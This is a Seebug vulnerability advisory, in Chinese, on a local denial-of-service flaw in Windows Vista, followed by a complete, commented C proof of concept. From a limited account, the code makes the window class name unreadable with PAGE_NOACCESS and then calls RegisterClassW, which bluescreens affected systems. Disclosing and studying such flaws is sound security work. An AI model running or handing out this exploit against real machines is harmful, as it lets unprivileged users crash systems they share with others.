Microsoft Windows Vista本地拒绝服务漏洞

2008-10-08T00:00:00
ID SSV:4164
Type seebug
Reporter Root
Modified 2008-10-08T00:00:00

Description

BUGTRAQ ID: 31570；CNCAN ID: CNCAN-2008100607

Microsoft Windows Vista 是微软开发的操作系统。Windows Vista 存在一处访问验证错误：下文的 PoC 表明，在受限（非管理员）本地账户下，先将窗口类名 lpszClassName 所在的内存页设为 PAGE_NOACCESS，再调用 RegisterClassW，即可在注册过程中触发访问违规并使系统蓝屏（BSoD），造成本地拒绝服务。漏洞仅可本地利用，PoC 中未展示任何代码执行或提权能力。

受影响版本：Microsoft Windows Vista Ultimate 64-bit edition SP1；Microsoft Windows Vista Ultimate 64-bit edition 0；Microsoft Windows Vista Home Premium 64-bit edition SP1；Microsoft Windows Vista Home Premium 64-bit edition 0；Microsoft Windows Vista Ultimate SP1；Microsoft Windows Vista Ultimate；Microsoft Windows Vista Home Premium SP1；Microsoft Windows Vista Home Premium。解决方案：本公告发布时厂商尚未提供补丁，请关注厂商主页：<a href=http://www.microsoft.com/ target=_blank>http://www.microsoft.com/</a>

                                        
                                            
/////////////////////////////////////////////////////////////////
// Windows Vista BSoD (Access violation) from limited account. //
// Tested on Home Premium & Ultimate @ October 05 2008         //
/////////////////////////////////////////////////////////////////
#include &lt;stdio.h&gt;
#include &lt;windows.h&gt;
 
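/* Window-class name the PoC makes unreadable. RegisterClassW(&wc) in main
 * has to read it through wc.lpszClassName, which is what drives the
 * fault / unprotect / single-step / re-protect cycle in ExceptionHandler. */
WCHAR szClass[] = L"BSODClass";

/* Vectored exception handler installed from main. The prototype is kept
 * as-is so the definition below still matches it; see the NOTE on the
 * definition about the documented VEH calling convention on 32-bit. */
int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo);

/* Shape of ntdll!RtlAddVectoredExceptionHandler(FirstHandler, Handler).
 * The export returns the registration handle (PVOID, NULL on failure);
 * declaring that return type lets a caller check it, and callers that
 * ignore the result are unaffected. The handler parameter is left as
 * LPVOID so ExceptionHandler can be passed without a cast. */
typedef PVOID (WINAPI* pFunc)(ULONG ulFirst, LPVOID lpHandler);
pFunc pRtlAddVectoredExceptionHandler;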
 
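/* Overlay for EXCEPTION_RECORD::ExceptionInformation on an access
 * violation, as used by ExceptionHandler: element [0] is the access type
 * (the original field name reads it as "write violation"), element [1] is
 * the faulting virtual address. ExceptionInformation is an array of
 * ULONG_PTR, so the first field is ULONG_PTR as well: the original DWORD
 * only matched the layout on 32-bit and, on 64-bit, relied on alignment
 * padding to keep lpAddress at offset 8. Field names are unchanged for
 * the existing user. */
typedef struct
{
    ULONG_PTR dwWriteViolation; /* ExceptionInformation[0]: access type   */
    LPVOID    lpAddress;        /* ExceptionInformation[1]: fault address */
} EXCEPTION_ACCESS_VIOLATION_PARAMS;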
 
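/* PoC entry point: install the vectored handler, make the page holding
 * szClass unreadable, then hand that class name to RegisterClassW. On the
 * affected Vista builds the registration bluescreens the machine; the
 * final printf is only reached on an unaffected system.
 *
 * Returns 0 if RegisterClassW came back (system not affected), 1 if the
 * setup steps failed before the trigger was reached. */
int main(void)
{
    WNDCLASSW wc;
    DWORD dwOldProt;
    HMODULE hNtdll;

    printf("Windows Vista BSoD from usermode/limited account.\n"
           "Coded by. Defsanguje - October 05 2008\n");

    /* Setup vectored exception handler (SEH would work too). The export is
     * resolved by name at run time, so the lookup can fail; calling through
     * a NULL function pointer would crash this process before the trigger.
     * GetModuleHandleA is used explicitly so the literal is correct whether
     * or not UNICODE is defined. */
    hNtdll = GetModuleHandleA("ntdll.dll");
    pRtlAddVectoredExceptionHandler = (hNtdll != NULL)
        ? (pFunc)GetProcAddress(hNtdll, "RtlAddVectoredExceptionHandler")
        : NULL;
    if (pRtlAddVectoredExceptionHandler == NULL) {
        fprintf(stderr, "RtlAddVectoredExceptionHandler not found (error %lu)\n",
                (unsigned long)GetLastError());
        return 1;
    }
    (*pRtlAddVectoredExceptionHandler)(TRUE, ExceptionHandler);

    /* Dummy class data. Everything except lpszClassName is filler,
     * including the NULL window procedure. */
    wc.style         = 0;
    wc.lpfnWndProc   = NULL;
    wc.cbClsExtra    = 0;
    wc.cbWndExtra    = 0;
    wc.hInstance     = GetModuleHandle(NULL);
    wc.hIcon         = NULL;
    wc.hCursor       = LoadCursor(NULL, IDC_ARROW);
    wc.hbrBackground = GetStockObject(HOLLOW_BRUSH);
    wc.lpszMenuName  = NULL;
    wc.lpszClassName = szClass;

    /* Make the page containing szClass unreadable. VirtualProtect works at
     * page granularity, so the whole page (and any other global that shares
     * it) is affected. From here on every access to that page faults into
     * ExceptionHandler, which unprotects it for one instruction and then
     * re-protects it. If this step fails there is nothing to trigger. */
    if (!VirtualProtect(szClass, 1, PAGE_NOACCESS, &dwOldProt)) {
        fprintf(stderr, "VirtualProtect(PAGE_NOACCESS) failed (error %lu)\n",
                (unsigned long)GetLastError());
        return 1;
    }

    /* The registration has to read lpszClassName; this is the trigger. */
    RegisterClassW(&wc);

    printf("You shouldn't see this");
    return 0;
}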
 
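/* Vectored exception handler driving the fault / unprotect / single-step /
 * re-protect cycle around the page that main set to PAGE_NOACCESS.
 *
 *  EXCEPTION_ACCESS_VIOLATION: make the faulting page PAGE_READWRITE again,
 *      remember its address, and set the trap flag (TF, bit 8 of EFlags =
 *      0x100) so the faulting instruction is re-executed and the very next
 *      instruction raises STATUS_SINGLE_STEP.
 *  STATUS_SINGLE_STEP: put that page back to PAGE_NOACCESS so any further
 *      access faults again.
 *
 * Returns EXCEPTION_CONTINUE_EXECUTION for the two cases it handled and
 * EXCEPTION_CONTINUE_SEARCH otherwise. The original returned
 * CONTINUE_EXECUTION for every exception code, including ones it did
 * nothing about (a breakpoint, a fault on a page VirtualProtect cannot
 * change, a NULL dereference): resuming those re-executes the faulting
 * instruction forever instead of letting the process die normally.
 *
 * NOTE(review): the documented VEH prototype is
 * LONG NTAPI Handler(PEXCEPTION_POINTERS). This definition keeps the
 * original int/cdecl signature so it still matches the forward declaration
 * at the top of the file; on 32-bit builds that is a calling-convention
 * mismatch with ntdll's dispatcher (stdcall expects the callee to pop the
 * argument) — confirm on x86 before relying on it. The static state assumes
 * only one thread takes these exceptions, which holds for this PoC. */
int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo)
{
    static LPVOID lpLastAddress = NULL;
    static DWORD dwOldProt = 0;
    EXCEPTION_RECORD* rec = lpExceptionInfo->ExceptionRecord;
    EXCEPTION_ACCESS_VIOLATION_PARAMS* avParams;

    switch (rec->ExceptionCode) {
    case EXCEPTION_ACCESS_VIOLATION:
        /* ExceptionInformation[0] = access type, [1] = faulting address. */
        avParams = (EXCEPTION_ACCESS_VIOLATION_PARAMS*)rec->ExceptionInformation;
        if (!VirtualProtect(avParams->lpAddress, 1, PAGE_READWRITE, &dwOldProt)) {
            /* Not a page we can unprotect (e.g. an unmapped address):
             * this is not our fault to resume. */
            return EXCEPTION_CONTINUE_SEARCH;
        }
        lpLastAddress = avParams->lpAddress;
        lpExceptionInfo->ContextRecord->EFlags |= 0x100; /* set TF */
        return EXCEPTION_CONTINUE_EXECUTION;

    case STATUS_SINGLE_STEP:
        /* A single-step we did not request (no pending unprotect) is
         * somebody else's, e.g. a debugger's. */
        if (lpLastAddress == NULL) {
            return EXCEPTION_CONTINUE_SEARCH;
        }
        VirtualProtect(lpLastAddress, 1, PAGE_NOACCESS, &dwOldProt);
        lpLastAddress = NULL;
        return EXCEPTION_CONTINUE_EXECUTION;

    default:
        return EXCEPTION_CONTINUE_SEARCH;
    }
}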